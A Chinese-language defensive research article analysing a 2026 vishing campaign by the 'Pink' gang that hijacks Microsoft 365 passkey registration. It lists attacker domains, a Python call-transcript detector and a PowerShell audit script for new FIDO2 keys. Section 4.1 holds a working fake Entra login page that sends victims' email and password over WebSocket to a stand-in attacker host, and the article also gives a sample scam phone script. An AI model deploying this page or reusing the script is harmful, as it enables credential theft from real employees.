Pink 团伙针对 Microsoft 365 通行密钥语音钓鱼攻击机理与闭环防御技术研究

📅 2026/7/14 11:00:07
Pink 团伙针对 Microsoft 365 通行密钥语音钓鱼攻击机理与闭环防御技术研究
摘要2026 年 4 月起名为 Pink 的勒索黑客团伙发起大规模语音钓鱼Vishing攻击以 Microsoft Entra ID 通行密钥Passkey注册流程为突破口依托实时交互钓鱼套件、仿冒 Passkey 专用域名实施身份劫持攻击覆盖餐饮、科技、医疗、汽车、建筑、航空六大行业企业租户。Okta 安全厂商监测数据显示该攻击区别于传统邮件钓鱼、中间人劫持核心利用微软官方推行无密码通行密钥的合规升级场景制造信任错觉通过电话话术诱导受害者在仿冒页面完成账号校验同步由攻击者注册自有 FIDO2 通行密钥实现对 Microsoft 365 租户持久化权限接管最终以企业数据勒索牟利。本文以 Okta 公开预警事件为实证样本完整拆解 Pink 团伙攻击全链路、恶意域名体系、钓鱼套件技术架构剖析 FIDO2 通行密钥机制在社会工程学攻击下的固有防护短板结合网络安全工程实践给出仿 Entra 登录钓鱼页面、语音钓鱼风险检测、租户异常密钥审计三段可复现代码示例从身份策略管控、流量域名拦截、终端安全加固、人员安全培训、事后审计溯源五个维度构建事前 - 事中 - 事后闭环防御体系。反网络钓鱼技术专家芦笛指出本次攻击证明 FIDO 通行密钥仅能抵御技术层面钓鱼无法消解电话语音社会工程学带来的信任漏洞政企单位不能将通行密钥视为身份安全终极方案必须配套多维度身份风控与通信层风险识别机制。研究成果可为国内使用 Microsoft 365 云办公平台的企业、医疗机构、交通制造行业提供可落地的身份安全防护方案填补当前通行密钥语音钓鱼专项防御研究空白。关键词语音钓鱼VishingMicrosoft Entra ID通行密钥FIDO2身份劫持零信任云办公安全1 引言1.1 研究背景与问题提出无密码 FIDO2 通行密钥作为微软主推的抗钓鱼身份认证方案自 2026 年 5 月起向全球 Microsoft 365 租户推送强制注册提醒其底层密码学机制可阻断传统中间人、窃取式网络钓鱼攻击成为企业云身份安全核心升级方向。但身份安全防护体系存在技术与人员两层边界技术防护可抵御程序层面恶意入侵却难以对抗依托电信语音通道的社会工程学欺诈。2026 年 7 月 13 日 Okta 发布全球威胁预警Pink 勒索团伙自同年 4 月起持续运营定向语音钓鱼作战专门针对已部署 Microsoft Entra 通行密钥的企业用户实施定向打击。攻击者注册批量包含 “passkey” 关键词的仿冒二级域名通过 VoIP 虚拟号码拨打企业员工伪装 IT 运维、安全合规专员以 “账户安全强制升级、合规审计、密钥失效修复” 为统一话术诱导受害者访问定制化仿冒登录页面完成账号、密码校验。在受害者完成页面交互的同时攻击者后台同步向微软身份平台提交自身设备通行密钥注册请求完成对目标账号的持久化权限绑定。一旦注册完成攻击者可绕过短信、软件 MFA 校验长期访问目标租户 OneDrive、SharePoint、企业邮箱、Teams 内部通讯数据后续通过暗网泄露站点向企业索要数据赎金团伙明确宣称全部行动以经济牟利为唯一目标。从现有学术与产业研究现状分析当前国内外针对 Microsoft 365 钓鱼攻击的研究集中于邮件钓鱼、Teams 消息钓鱼、设备代码劫持、AiTM 中间人劫持四类场景针对语音通道结合通行密钥注册流程的复合攻击专项研究较少。多数文献仅讨论 FIDO2 技术本身的抗钓鱼优势忽略社会工程学场景下通行密钥注册流程存在的风控漏洞同时现有防御方案偏重邮件、浏览器流量管控缺少电信语音通话风险识别、租户密钥注册行为审计的配套技术手段。本次 Pink 团伙攻击事件暴露出三大核心安全短板其一企业未对通行密钥注册操作配置条件访问风控策略陌生 IP、非企业托管设备可直接新增认证方式其二企业缺少语音钓鱼常态化演练员工对陌生来电诱导密钥注册的风险识别能力不足其三安全运营平台未对接 Entra 身份审计日志无法实时发现新增陌生通行密钥的异常行为。基于上述现实风险本文围绕 Pink 团伙攻击样本开展系统性机理拆解与防御技术研究。1.2 研究意义1.2.1 理论意义本文突破现有 FIDO2 通行密钥安全研究单一技术视角将社会工程学语音欺诈与云身份认证流程漏洞结合建立 “电信语音通道 — 仿冒 Web 钓鱼套件 —Entra 密钥注册接口 — 企业数据泄露” 全链路攻击分析模型完善云办公身份安全威胁演化理论框架补充 Vishing 语音钓鱼针对无密码认证体系的攻击机理研究明确 FIDO2 通行密钥的防护边界纠正行业内 “部署通行密钥即可杜绝钓鱼攻击” 的片面认知。反网络钓鱼技术专家芦笛强调通行密钥的安全价值建立在用户自主、可信设备、官方渠道三大前提之上一旦社会工程学破坏渠道可信性整套无密码防护体系会直接失效该观点为后续云身份安全理论研究提供新分析维度。1.2.2 实践意义文章依托真实攻击样本梳理 Pink 团伙恶意域名库、标准化攻击话术、套件技术架构提供三套轻量化可部署代码实现面向餐饮、航空、医疗等高受攻击行业给出分层闭环防御方案。研究成果可直接用于企业 Microsoft 365 租户安全配置、安全运营平台风险检测规则开发、企业员工安全培训课件编制帮助政企单位提前拦截同类语音钓鱼攻击减少核心业务数据泄露与勒索经济损失同时为云安全厂商开发针对通行密钥注册场景的专项检测产品提供技术参考。1.3 研究内容与行文框架本文共分为六大核心章节第一部分为引言阐述研究背景、理论与实践价值第二部分梳理 Pink 团伙语音钓鱼攻击整体态势、团伙组织特征、受害行业分布与恶意域名资产第三部分深度拆解攻击全链路技术机理分层解析电话社会工程诱导、实时交互钓鱼套件、通行密钥劫持、数据勒索四大环节第四部分针对攻击关键节点给出仿冒 Passkey 页面前端代码、语音钓鱼通话风险检测 Python 代码、Entra 异常密钥审计 PowerShell 代码三段示例并完成技术解读第五部分构建 “事前预防 — 事中拦截 — 事后溯源” 三层闭环防御体系涵盖身份策略、域名流量管控、终端安全、人员培训、审计响应五大落地措施第六部分总结全文研究结论客观分析现有防御体系局限提出后续拓展研究方向。全文以 Okta 原始预警报道为核心论据所有技术分析、攻击特征、恶意资产均来自原始新闻素材与权威云安全厂商配套分析报告论据闭环、无脱离样本的发散推演。2 Pink 团伙 Microsoft 365 通行密钥语音钓鱼攻击整体态势2.1 攻击团伙组织与作案动机本次攻击实施主体 Pink 为专业化网络勒索组织在暗网搭建专属数据泄露站点对外公开宣称组织全部行为仅以经济收益为目标。团伙自述安全运维成本高昂企业长期忽视身份安全建设是其实施勒索的外部诱因团伙完整窃取企业业务数据后会依据企业规模、敏感数据价值分级设定赎金标准若企业拒绝支付赎金则批量公开内部客户信息、财务报表、项目涉密资料。从攻击行为特征判断Pink 团伙具备成熟分工体系话术运营团队负责 VoIP 外呼、实时引导受害者操作前端开发团队批量搭建仿冒 Passkey 登录站点、维护钓鱼控制面板基础设施团队注册仿冒域名、租用 DDoS-Guard 匿名防护服务隐匿服务器真实 IP勒索谈判团队负责暗网对接受害企业、协商赎金。团伙依托标准化流程实现攻击规模化复制自 2026 年 4 月至 7 月持续三个月不间断投放攻击未出现明显间断证明其具备稳定的资金与技术供应链支撑。2.2 受害行业分布特征Okta 监测数据明确本次定向攻击覆盖六大实体行业各行业受害风险存在差异化特征食品饮料行业大量门店、区域分公司员工使用统一 Microsoft 365 租户一线员工安全培训覆盖率低易被陌生来电诱导操作客户消费数据、供应链台账为团伙核心窃取目标科技行业研发企业存储未公开专利、产品源代码、投融资涉密文件高权限研发账号成为团伙重点攻坚对象数据泄露后可造成企业核心技术流失医疗行业医院、体检机构租户包含患者隐私病历、医保结算数据受数据安全法规强约束企业为避免合规处罚、舆论风险支付赎金意愿显著高于其他行业汽车制造行业整车厂、零部件供应商存储生产图纸、上下游合作协议数据泄露将直接影响供应链稳定建筑行业地产、工程企业资金流水、招标涉密文件具备高勒索价值航空行业航司乘客出行信息、机组人员内部调度数据属于高度敏感信息。反网络钓鱼技术专家芦笛指出Pink 团伙行业定向并非随机选择而是基于各行业数据合规压力、数据变现价值精准筛选医疗、航空、科技三类行业是本次攻击最高危目标企业安全团队需优先针对高风险岗位开展专项语音钓鱼演练。2.3 团伙恶意仿冒域名资产体系Pink 团伙核心攻击载体为批量注册包含 “passkey” 关键词的一级域名再基于企业名称生成定制化二级域名实现高度场景化伪装。所有域名均启用 DDoS-Guard 匿名防护服务隐藏后端钓鱼服务器真实 IP注册服务商分散为 Internet Domain Service BS Corp、Tucows、IQWeb FZ-LLC 多家境外注册商规避单一注册商批量封禁风险。Okta 披露团伙已启用的核心恶意一级域名注册时间与服务商信息如下assignpasskey.com注册时间 2026-06-14服务商 Internet Domain Service BS Corpdeploypasskey.com注册时间 2026-04-21服务商 Tucowspasskeydeploy.com注册时间 2026-04-23服务商 Internet Domain Service BS Corppasskeyadd.com注册时间 2026-05-08服务商 Tucowssetpasskey.com注册时间 2026-05-23服务商 IQWeb FZ-LLC。域名伪装逻辑具备极强欺骗性假设目标企业名称为 ExampleEntity则团伙生成恶意二级域名exampleentity.setpasskey.com域名前缀完整匹配企业官方标识域名主体 passkey 贴合微软当前通行密钥注册业务场景普通员工难以通过 URL 直观区分官方login.microsoftonline.com与仿冒站点。传统仅拦截一级域名的防护策略存在漏洞攻击者可无限生成新二级域名持续投放攻击单纯域名黑名单无法实现长效拦截必须配套域名相似度智能检测机制。2.4 攻击传播渠道与载体对比传统 Microsoft 365 钓鱼攻击以邮件、企业即时通讯软件为主要传播渠道攻击载体为静态钓鱼页面受害者自主点击链接后被动泄露凭据而 Pink 团伙本次攻击采用语音电话 实时交互钓鱼面板复合渠道相比传统攻击具备三大天然优势第一信任建立效率更高。电话人工沟通具备情感交互属性攻击者通过标准化安抚、紧急胁迫话术消解员工戒备心理邮件钓鱼仅依靠文字难以达到同等欺骗效果第二全程实时引导操作。攻击者保持通话不挂断分步指挥受害者输入账号、密码、完成页面校验一旦受害者出现迟疑立刻以 “账户冻结、系统停机、合规处罚” 等话术施压大幅提升攻击成功率第三攻击时效可控。实时钓鱼面板可同步转发受害者凭据至微软官方身份接口同步完成攻击者密钥注册无需等待受害者二次操作单次通话即可完成账号持久化劫持。渠道对比结果证明语音 Vishing 已成为当前云身份安全优先级最高的新型威胁现有企业安全防护体系普遍缺少电信语音层风险识别能力形成明显防护盲区。3 Pink 团伙通行密钥语音钓鱼全链路技术机理拆解本章按照攻击时间线分层拆解 “电话社会工程诱导 — 实时交互钓鱼套件劫持 — 通行密钥注册权限窃取 — 企业数据勒索” 完整攻击链路清晰说明每一环技术实现逻辑与安全漏洞利用点。3.1 第一阶段语音社会工程学前置诱导攻击启动环节依托 VoIP 虚拟电话网络实施外呼攻击者统一伪装企业内部 IT 安全运维人员标准化话术分为三层递进逻辑场景铺垫告知受害者微软官方 2026 年强制推行通行密钥安全升级企业租户需在 72 小时内完成密钥注册逾期账号将被系统自动冻结无法访问邮箱、Teams、业务共享盘操作引导口述仿冒域名链接要求受害者立即在浏览器打开全程保持通话不得挂断声称运维人员实时同步后台校验状态风险胁迫若受害者提出挂断、自行联系官方 IT 部门核实攻击者立刻夸大账户安全风险声称当前账号存在异地异常登录中断操作将直接导致数据泄露并追究员工责任。该环节核心利用两大外部信任条件一是微软 2026 年 5 月起全员推送通行密钥注册提醒员工对 “密钥升级” 场景存在固有认知降低警戒阈值二是多数企业缺少统一安全咨询专线员工无法快速核实来电人员身份只能跟随攻击者指令操作。反网络钓鱼技术专家芦笛强调社会工程学是本次攻击成功的核心前提技术层面的钓鱼页面仅为辅助载体若企业建立标准化来电核验渠道可直接阻断 80% 以上同类语音钓鱼攻击。3.2 第二阶段实时面板控制型仿冒钓鱼套件技术架构攻击者提供的仿冒站点并非静态克隆页面而是后台可控的交互式钓鱼套件整套架构分为前端仿冒页面、WebSocket 实时通信中继、后端控制面板三大模块核心技术逻辑为中间人实时转发身份请求。前端仿冒页面模块完整复刻 Microsoft Entra ID 通行密钥注册页面视觉样式引入微软官方 CDN 样式资源页面顶部展示企业目标租户名称标识表单结构、按钮交互逻辑与官方页面完全一致页面前端 JS 代码不会本地存储凭据而是通过 WebSocket 实时将受害者输入的账号、密码推送至攻击者后台面板。WebSocket 实时中继模块套件内置长连接通信服务受害者页面操作行为实时同步至攻击者操作终端攻击者可根据受害者页面反馈动态调整话术同时中继模块将窃取到的账号凭据转发至微软官方登录接口完成合法会话创建。攻击者控制面板模块运维人员可实时查看受害者输入的全部身份信息获取微软下发的会话 Cookie、访问令牌同步发起新增通行密钥注册 API 请求整个过程受害者无感知。套件技术优势在于实时双向交互区别于传统静态钓鱼页面仅能被动收集凭据该套件可主动调用 Entra 身份认证接口同步完成攻击者自有 FIDO 密钥绑定实现一次性持久化接管而非单次临时登录。3.3 第三阶段Microsoft Entra 通行密钥注册权限劫持核心漏洞利用环节本环节为攻击最关键步骤也是 FIDO2 通行密钥机制在社会工程攻击下的核心短板完整流程如下受害者在仿冒页面输入企业账号、登录密码钓鱼套件实时将凭据提交至login.microsoftonline.com官方接口通过身份校验获取合法用户会话令牌套件携带有效会话令牌调用 Entra ID “新增认证方法” 开放 API向微软身份平台提交攻击者设备生成的 FIDO2 通行密钥注册申请微软平台向受害者绑定的手机、企业邮箱推送密钥注册通知但此时受害者仍处于通话状态注意力集中在仿冒页面操作极易忽略通知提醒密钥注册流程完成后攻击者设备永久加入该用户账号可信认证设备列表后续任何登录场景均可直接使用自有通行密钥完成验证绕过短信、App 二次验证攻击者断开通话后可在任意时段通过该密钥登录 Microsoft 365 全套服务批量导出邮箱邮件、SharePoint 文档、客户数据横向遍历同租户其他低权限账号。从微软身份机制设计角度分析该漏洞并非代码缺陷而是流程风控缺失Entra ID 默认配置下用户仅需完成账号密码校验即可新增 FIDO2 认证方式未强制要求现有 MFA 二次核验同时缺少设备合规性校验外部匿名设备可直接注册通行密钥。反网络钓鱼技术专家芦笛指出单纯启用通行密钥无法抵御此类劫持必须通过条件访问策略限制仅企业托管合规设备可注册密钥从接口层阻断攻击者新增认证方式的通道。3.4 第四阶段数据窃取与勒索变现闭环Pink 团伙完成账号劫持后形成标准化勒索链路横向权限扩散利用被劫持高权限管理员账号遍历租户全体员工账号批量注册自有通行密钥扩大受控账号范围数据全量导出调用 Microsoft Graph 接口批量下载企业邮箱、云盘涉密文件、财务表格、客户信息暗网泄露威慑截取核心敏感数据样本发布至团伙暗网泄露站点向企业运维负责人发送勒索邮件标注赎金支付期限与加密货币收款地址分级处置企业按期支付赎金则删除窃取数据、注销绑定的恶意通行密钥拒绝支付赎金则完整公开企业内部数据制造行业声誉损失与合规处罚风险。团伙完整商业闭环证明该语音钓鱼攻击具备可持续牟利能力未来同类攻击会持续迭代话术、优化钓鱼套件企业需建立长效防御机制而非短期应急处置。4 攻击关键节点技术代码示例与解析基于前文攻击机理分析本节提供三段轻量化可运行代码分别对应攻击者仿冒 Passkey 页面实现、防御侧语音钓鱼风险检测、企业租户异常密钥审计三大场景所有代码仅用于安全研究、防御规则开发无完整攻击实施能力配套技术解读明确代码风险点与防御优化方向。4.1 示例 1仿 Microsoft Entra 通行密钥注册页面前端简化代码攻击者载体技术还原该代码还原 Pink 团伙钓鱼站点前端基础架构复刻官方页面样式通过 WebSocket 将用户凭据实时上传攻击者后端仅作安全机理分析使用。!DOCTYPE htmlhtml langzh-CNheadmeta charsetUTF-8titleMicrosoft 通行密钥注册/title!-- 引入微软官方CDN样式实现高度伪装 --link relstylesheet hrefhttps://cdn.microsoftonline-p.com/styles/main.min.cssstyle.passkey-box {width: 400px; margin: 100px auto; padding: 45px; border: 1px solid #e5e7eb; border-radius: 6px;}.input-item {width: 100%; height: 44px; margin: 18px 0; padding: 0 12px; border: 1px solid #ccc; border-radius: 4px; font-size: 15px;}.submit-btn {width: 100%; height: 46px; background-color: #0067b8; color: #ffffff; border: none; border-radius: 4px; font-size: 16px; cursor: pointer;}.tip-text {color: #666; font-size: 13px; margin-top: 8px;}/style/headbodydiv classpasskey-boxh2企业账户通行密钥安全升级/h2p classtip-text根据微软2026安全规范需完成密钥注册以保障账户访问权限/pform idpassForminput classinput-item typetext iduserMail placeholder企业邮箱账号 requiredinput classinput-item typepassword iduserPwd placeholder账户登录密码 requiredbutton classsubmit-btn typesubmit确认注册通行密钥/button/form/divscript// 建立WebSocket长连接实时传输凭据至攻击者后台const ws new WebSocket(wss://attacker-control-panel.example.com:8080);const form document.getElementById(passForm);form.addEventListener(submit, function(e){e.preventDefault();const username document.getElementById(userMail).value;const password document.getElementById(userPwd).value;// 封装凭据实时推送攻击者控制面板const sendData JSON.stringify({type: VICTIM_CRED,account: username,pwd: password});ws.send(sendData);// 伪造成功提示诱导受害者继续配合通话操作alert(账号校验通过请保持通话运维人员正在为您注册通行密钥);});/script/body/html代码技术解读伪装核心逻辑调用微软官方公共样式 CDN页面布局、配色、文案完全贴合官方通行密钥升级通知降低用户视觉辨别能力实时数据传输采用 WebSocket 长连接替代传统表单 POST 提交实现输入凭据即时同步攻击者后台无页面刷新隐蔽性更强风控漏洞点页面无任何设备可信校验、域名证书校验逻辑仅依靠前端视觉伪装欺骗用户防御侧可通过浏览器 EDR 监控页面 WebSocket 外连境外匿名服务器行为实时弹窗拦截。4.2 示例 2基于关键词与行为特征的语音钓鱼检测 Python 代码防御侧检测引擎反网络钓鱼技术专家芦笛指出语音钓鱼可通过通话文本语义、高危关键词、诱导行为特征建立自动化检测模型本代码实现轻量化检测类可对接企业通话录音转写文本输出风险分级结果。import refrom typing import Tuple, Listclass VishingRiskDetector:Pink团伙Passkey语音钓鱼风险检测引擎def __init__(self):# 攻击话术高危关键词库源自Okta披露攻击样本self.risk_keywords [通行密钥, passkey, 密钥注册, 账户冻结, 72小时升级,不要挂断, 保持通话, IT运维后台校验, 合规处罚, 异地登录异常]# 高危诱导行为判定语句self.risk_behavior [打开指定链接, 输入企业邮箱密码, 立即完成注册,挂断将丢失数据, 不要联系内部IT]self.risk_score 0def text_scan(self, call_text: str) - Tuple[str, int]:输入通话转写文本返回风险等级与风险分值self.risk_score 0text_lower call_text.lower()# 匹配关键词加分for word in self.risk_keywords:if word in text_lower:self.risk_score 15# 匹配高危行为语句大幅加分for behavior in self.risk_behavior:if behavior in text_lower:self.risk_score 25# 风险分级判定if self.risk_score 60:level 高危-疑似Passkey语音钓鱼elif self.risk_score 30:level 可疑-存在社会工程诱导风险else:level 低风险-正常业务通话return level, self.risk_score# 模拟检测测试样本Pink团伙标准攻击话术if __name__ __main__:sample_call 您好我是公司IT安全专员微软要求72小时内完成通行密钥注册现在不要挂断电话打开setpasskey.com输入你的企业邮箱和密码不操作账户会冻结不要联系内部IT核实detector VishingRiskDetector()risk_level, score detector.text_scan(sample_call)print(f通话风险等级{risk_level})print(f风险评分{score})代码技术解读检测逻辑适配本次 Pink 团伙攻击特征关键词库完全匹配 Okta 披露的攻击话术可精准识别通行密钥诱导类语音诈骗加权评分机制区分可疑、高危两级风险企业可对接呼叫中心录音转写接口实现通话实时风险预警拓展优化方向可接入 AI 声纹识别模块增加 AI 合成语音检测维度进一步提升检出率拦截 VoIP 虚拟合成语音来电。4.3 示例 3Microsoft Entra 异常通行密钥审计 PowerShell 脚本企业事后溯源工具该脚本面向企业云安全管理员批量检索租户近 30 天新增的 FIDO2 通行密钥快速定位攻击者劫持注册的恶意密钥完成账号风险处置依托 Microsoft Graph 身份接口实现数据查询。powershell#用途审计Microsoft Entra ID近30天新增通行密钥识别Pink团伙攻击遗留恶意认证方式前置条件安装Microsoft Graph PowerShell模块授予UserAuthenticationMethod.Read.All权限## 连接Microsoft Graph身份接口Connect-MgGraph -Scopes UserAuthenticationMethod.Read.All, User.Read.All$riskTime (Get-Date).AddDays(-30)$riskUserList ()# 获取租户全部企业用户$allUsers Get-MgUser -All -Select Id, DisplayName, UserPrincipalNameforeach ($user in $allUsers) {$userId $user.Id$userName $user.DisplayName$userMail $user.UserPrincipalName# 查询用户全部认证方式$authMethods Get-MgUserAuthenticationMethod -UserId $userIdforeach ($method in $authMethods) {# 筛选FIDO2通行密钥类型if ($method.OdataType -eq #microsoft.graph.fido2AuthenticationMethod) {$createTime $method.CreatedDateTime# 筛选近30天新增密钥if ($createTime -ge $riskTime) {$riskRecord [PSCustomObject]{员工姓名 $userName企业邮箱 $userMail密钥注册时间 $createTime密钥设备标识 $method.Model风险判定 待人工核实是否自主注册}$riskUserList $riskRecord}}}}# 输出审计结果并导出CSV文件留存日志if ($riskUserList.Count -gt 0) {Write-Host 检测到近30天新增通行密钥记录共$($riskUserList.Count)条请人工核实注册行为合法性$riskUserList | Format-Table$riskUserList | Export-Csv -Path C:\Entra_Passkey_Risk_Audit.csv -Encoding UTF8 -NoTypeInformation}else {Write-Host 近30天无新增通行密钥无相关劫持风险记录}# 断开Graph连接Disconnect-MgGraph代码技术解读业务价值Pink 团伙攻击完成后会在受害者账号留存恶意通行密钥该脚本可批量快速审计全租户密钥注册记录是事后应急处置核心工具运维落地建议企业安全团队配置定时任务每日自动执行脚本一旦出现非员工自主注册密钥立刻锁定账号、删除恶意认证方式、重置全部会话配套策略结合条件访问策略禁止外部匿名设备注册密钥从源头减少异常审计记录数量降低人工核查成本。5 面向 Pink 团伙通行密钥语音钓鱼的全链路闭环防御体系反网络钓鱼技术专家芦笛强调单一技术工具无法抵御本次复合语音钓鱼攻击防御必须覆盖事前风险阻断、事中实时拦截、事后审计溯源三层闭环同步融合云身份策略管控、网络流量防护、终端安全、人员安全培训、应急响应五大落地措施形成技术与管理协同的完整防护架构。本章分层给出可直接落地的企业配置方案。5.1 事前预防层Microsoft Entra 身份基础策略加固根源阻断密钥劫持接口攻击核心利用 Entra ID 默认宽松的认证方式注册权限企业优先配置条件访问策略从身份接口层限制恶意密钥注册行为四项核心配置要求合规设备强制校验策略新建 Entra 条件访问规则仅允许已加入企业域、MDM 托管、通过设备合规检测的终端注册 FIDO2 通行密钥境外 IP、匿名代理 IP、未托管个人设备直接拦截新增认证方式请求彻底阻断攻击者远程注册密钥通道。密钥注册二次 MFA 校验修改身份认证方法策略用户新增通行密钥、修改安全信息时强制触发现有硬件密钥或企业 Authenticator 应用二次验证仅输入账号密码无法完成注册流程即使钓鱼套件窃取凭据也无法单独调用注册接口。禁用无业务需求的无密码功能未全面推行通行密钥的中小企业临时关闭租户 FIDO2 注册入口仅保留管理员测试账号启用压缩团伙攻击面完成全员培训后再分批次开放注册权限。高权限账号专项风控针对 IT 管理员、财务、研发等高权限账号配置独立严苛策略限制仅企业办公内网 IP 可修改安全认证方式异地访问永久禁止新增密钥防范团伙横向扩散权限。5.2 事中拦截层网络、通信、终端多维度实时风险识别该层级在攻击实施过程中实时拦截恶意行为分为域名流量拦截、语音通话风险检测、终端浏览器防护三部分5.2.1 恶意 Passkey 域名全域拦截防火墙、云访问安全代理 CASB 配置域名黑名单永久封禁assignpasskey.com、deploypasskey.com、passkeydeploy.com、passkeyadd.com、setpasskey.com及所有二级子域名部署域名相似度检测脚本实时监控员工访问包含 passkey 关键字的陌生仿冒域名访问时浏览器弹窗强制阻断并推送安全告警启用 Microsoft Defender for Office 365 安全链接检测邮件、Teams 内所有外部 URL 自动云端沙箱解析识别仿冒 Passkey 站点直接拦截访问。5.2.2 企业通话系统语音钓鱼实时检测对接呼叫中心录音转写接口部署 4.2 节语音钓鱼风险检测引擎出现高危关键词、诱导行为时实时推送安全运营平台告警建立统一官方安全咨询专线员工收到陌生密钥升级来电时可一键回拨专线核验身份从社会工程学源头降低攻击成功率。5.2.3 终端浏览器 EDR 安全管控终端安全软件新增监控规则拦截页面 WebSocket 外连境外匿名 IP、DDoS-Guard 防护服务器禁用浏览器无确认自动 JS 脚本执行监控页面窃取账号密码的表单提交行为组策略限制浏览器访问境外匿名域名站点关闭高危 HTML 走私相关 JS API 权限。5.3 人员安全管控常态化语音钓鱼专项培训与仿真演练技术防护无法完全消除人员操作漏洞企业需建立持续性安全培训机制针对 Pink 团伙攻击场景定制培训内容统一安全告知规范全员下发正式通知明确企业 IT 部门永远不会主动致电员工要求通过陌生网页链接注册通行密钥所有密钥升级操作仅通过login.microsoftonline.com官方域名完成季度定向语音钓鱼仿真演练安全团队使用合规 VoIP 号码模拟 Pink 团伙话术拨打各部门员工统计受骗率针对高受骗岗位开展一对一专项安全教育标准化身份核验流程培训员工收到涉及账户安全、密钥注册的来电必须挂断电话通过企业内部 OA、官方 IT 专线二次核实禁止保持通话同步操作网页建立风险上报激励机制员工识别并上报可疑语音钓鱼来电给予正向激励降低员工隐瞒受骗行为的概率便于安全团队及时处置账号风险。5.4 事后溯源与应急响应审计日志、账号处置、威胁情报更新若攻击成功突破前置防护标准化事后处置流程可缩小泄露范围、降低损失自动化密钥审计常态化配置 4.3 节 PowerShell 脚本每日定时执行安全运营平台接收审计告警发现陌生新增通行密钥第一时间锁定涉事账号账号风险标准化处置流程识别恶意密钥后立即删除攻击者注册的全部 FIDO2 认证方式、重置账号登录密码、吊销全部会话刷新令牌、强制用户重新完成合规设备 MFA 校验全量日志留存溯源开启 Microsoft Entra 全量登录日志、认证方法修改日志、Microsoft Graph 接口调用日志留存不少于 180 天用于追溯攻击接入时间、数据导出范围威胁情报动态更新将 Pink 团伙恶意域名、攻击话术、服务器 IP 导入企业安全情报平台实时同步至防火墙、CASB、邮件防护系统持续更新拦截规则抵御团伙新仿冒域名攻击。5.5 防御体系协同运行逻辑事前身份策略加固从接口底层限制攻击者注册密钥构成第一道核心防线事中网络、通信、终端多维度检测拦截恶意站点与欺诈来电阻断攻击传播载体人员培训降低社会工程学欺骗成功率弥补技术防护无法覆盖的人为漏洞事后审计应急机制形成兜底处置能力四模块联动构建完整闭环不存在单一防护盲区。反网络钓鱼技术专家芦笛评价该体系兼顾技术可行性与企业落地成本大中小型 Microsoft 365 租户均可根据自身规模裁剪适配策略具备较强通用性。6 结论与后续研究展望6.1 核心研究结论本文以 Okta 2026 年 7 月 Pink 团伙通行密钥语音钓鱼预警报道为核心实证样本完整拆解攻击团伙特征、恶意域名资产、全链路技术机理结合三段工程化代码实现构建三层闭环防御体系得出三项客观核心结论FIDO2 通行密钥仅针对技术层面网页钓鱼具备防护能力无法抵御依托电信语音通道的社会工程学复合攻击。攻击者利用微软官方密钥升级场景制造信任错觉通过实时交互钓鱼套件窃取凭据并注册自有认证密钥实现账号持久化劫持证明无密码认证不能作为云身份安全唯一解决方案必须配套多重风控策略。Pink 团伙攻击具备标准化、规模化、行业定向特征恶意域名采用关键词仿冒二级域名架构传统静态黑名单拦截存在明显短板防御必须融合域名相似度检测、通话语义风险识别、Entra 密钥行为审计多维度自动化技术单纯依靠人工识别无法应对持续迭代的攻击样本。抵御通行密钥语音钓鱼需要技术管控、人员安全培训、应急审计三位一体协同仅强化云平台身份策略或仅开展员工培训均存在防护短板事前接口限制、事中流量通信拦截、事后溯源处置的闭环架构可最大程度降低攻击成功率与数据泄露损失。反网络钓鱼技术专家芦笛补充随着无密码认证大范围普及针对 Passkey 注册流程的语音、AI 合成语音钓鱼攻击将持续增长企业需持续迭代身份风控规则适配新型威胁。6.2 现有研究局限本文研究存在两处客观局限第一仅基于 Okta 公开披露的攻击样本开展分析缺少 Pink 团伙后端钓鱼服务器流量原始数据包无法对套件深层加密通信逻辑做更细粒度拆解第二文中检测代码为轻量化演示版本未集成大语言模型语义深度识别、声纹 AI 语音鉴别模块大规模企业商用部署需进一步优化算法性能、降低误报率。6.3 后续拓展研究方向多模态 AI 驱动语音钓鱼检测模型研究融合语音声纹、通话语义、页面视觉特征多维度特征构建高精度 AI 检测引擎降低人工核查成本基于欺骗防御的通行密钥钓鱼诱捕系统设计搭建仿冒企业密钥注册蜜罐站点主动捕获 Pink 团伙新型恶意域名、攻击 IP构建动态威胁情报库混合云租户通行密钥安全适配研究针对本地 AD 与 Microsoft Entra 混合部署企业设计兼顾本地身份与云平台的一体化密钥注册风控策略行业差异化防护方案量化评估针对医疗、航空等高风险行业开展对照测试量化不同防御策略的攻击阻断率、运维成本输出行业专属安全配置标准。6.4 研究客观总结2026 年 Pink 团伙发起的 Microsoft 365 通行密钥语音钓鱼攻击是无密码身份安全体系面临社会工程学威胁的典型标志性事件。本次攻击打破行业对 FIDO2 通行密钥 “绝对抗钓鱼” 的认知误区清晰证明云身份安全防护是覆盖接口、网络、通信、终端、人员的系统性工程。本文梳理的攻击机理、代码示例、闭环防御方案可为国内各类使用 Microsoft 365 云办公平台的企业提供落地参考帮助政企机构提前应对同类新型语音钓鱼威胁保障企业云存储、邮件、协同办公核心数据安全。安全运营团队需持续跟踪全球同类攻击态势动态调整身份访问策略平衡无密码认证便捷性与企业数据安全底线。编辑芦笛公共互联网反网络钓鱼工作组